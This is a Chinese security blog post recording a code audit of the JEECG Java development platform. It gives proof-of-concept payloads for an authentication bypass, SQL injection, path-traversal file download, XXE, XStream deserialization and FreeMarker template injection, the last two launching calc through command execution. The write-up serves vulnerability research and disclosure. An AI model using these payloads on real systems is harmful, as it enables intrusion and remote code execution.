记一次开源cms的Java代审
文章首发于Tops安全团队微信公众号:记一次开源cms的Java代审,欢迎关注!
环境搭建:
JEECG(J2EE Code Generation)是一款基于代码生成器的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发),可以帮助解决Java项目80%的重复工作,让开发更多关注业务逻辑。
- 项目地址:https://gitee.com/jeecg/jeecg
- 环境搭建:http://idoc.jeecg.com/1275933
- 运行环境:Windows10 + Mysql5.7.26 + eclipse2022-09 + Tomcat7 + Jdk1.7
- 系统架构:SpringMVC + Hibernate + Minidao(类Mybatis) + Easyui(UI库)+ Jquery + Boostrap + Ehcache + Redis + Ztree
系统登录页面展示:
0x00 权限验证绕过——AuthInterceptor:
拦截器文件路径:org/jeecgframework/core/interceptors/AuthInterceptor.java
可以使用/api/../绕过 AuthInterceptor的认证,无需登录:
0x01 SQL注入:
文件路径:org/jeecgframework/web/cgform/controller/autolist/CgAutoListController.java,查看相关代码:
用户输入的动态参数field、sort和order未经过滤就传入到querySingle()方法中,然后实例化一个StringBuilder对象,通过成员方法append()拼接sql语句,然后调用findForJdbcParam执行SQL
POC:order=desc&page=1&rows=10&sort=extractvalue%281%2Cconcat%28char%28126%29%2C@@version%29%29,漏洞证明:
0x02 任意文件上传:
从控制层可以发现多处任意文件上传,这里举一例:
文件路径:com/jeecg/demo/controller/JeecgFormDemoController.java,查看相关代码:
最后调用org/jeecgframework/core/common/dao/impl/CommonDao.java的uploadFile()方法,通过利用spring中的FileCopyUtils.copy()复制文件
漏洞证明:
0x03 任意文件下载/读取:
文件路径:com/jeecg/demo/controller/JeecgFormDemoController.java,查看相关代码:
获取用户输入的请求参数dbpath、filename,filename为自定义下载的文件名,dbpath直接与硬编码的本地路径进行拼接作为请求下载的文件路径,打开文件对象并创建文件输入流,后得到响应对象的输出流,造成了任意文件下载/读取漏洞
POC:http://192.168.0.102:8080/jeecg/jeecgFormDemoController/filedown.do?filename=123&filepath=../ceshi.txt
漏洞证明:
0x04 XML外部实体注入:
文件路径:org/jeecgframework/core/common/dao/impl/CommonDao.java,查看相关代码:
使用了第三方组件SAXReader,默认的解析方法会出现XXE 漏洞,接着查找相应控制层的代码,是否调用了该方法
漏洞证明:
第三方组件漏洞:
0x01 XStream反序列化漏洞:
XStream版本为1.4.6,文件路径:org/jeecgframework/web/cgform/controller/build/CgformSqlController.java
若目录不存在,会在upload文件夹下创建目录,然后将上传的文件通过unzip()方法进行解压,获取到该目录的第一个文件利用xStream.fromXML进行解析
POC:
<sorted-set>
<string>foo</string>
<contact class='dynamic-proxy'>
<interface>java.lang.Comparable</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>calc</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
</sorted-set>
漏洞证明:
0x02 FreeMarker 模板注入:
发现pom.xml中引入了FreeMarker模板引擎,大概率是存在模板注入的,全局搜索StringTemplateLoader#putTemplate和Template#process
登录系统,发现在“消息中间件”——“消息模板”处存在模板注入,POC:
<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}
点击“推送测试”即可触发漏洞:
根据请求包,可知相关文件路径:org/jeecgframework/web/system/sms/controller/TSSmsTemplateController.java,查看相关代码:
由于是点击推送后才触发,根据逻辑直接跟进到sendMessage()方法:
该方法首先根据请求中传入的templateCode参数进行SQL查询,使用封装返回结果实体类,获取到模板内容并传参给getTempletContent方法
从该方法中可以知道是利用freemarker引擎进行内容解析,最后调用template.process()触发漏洞
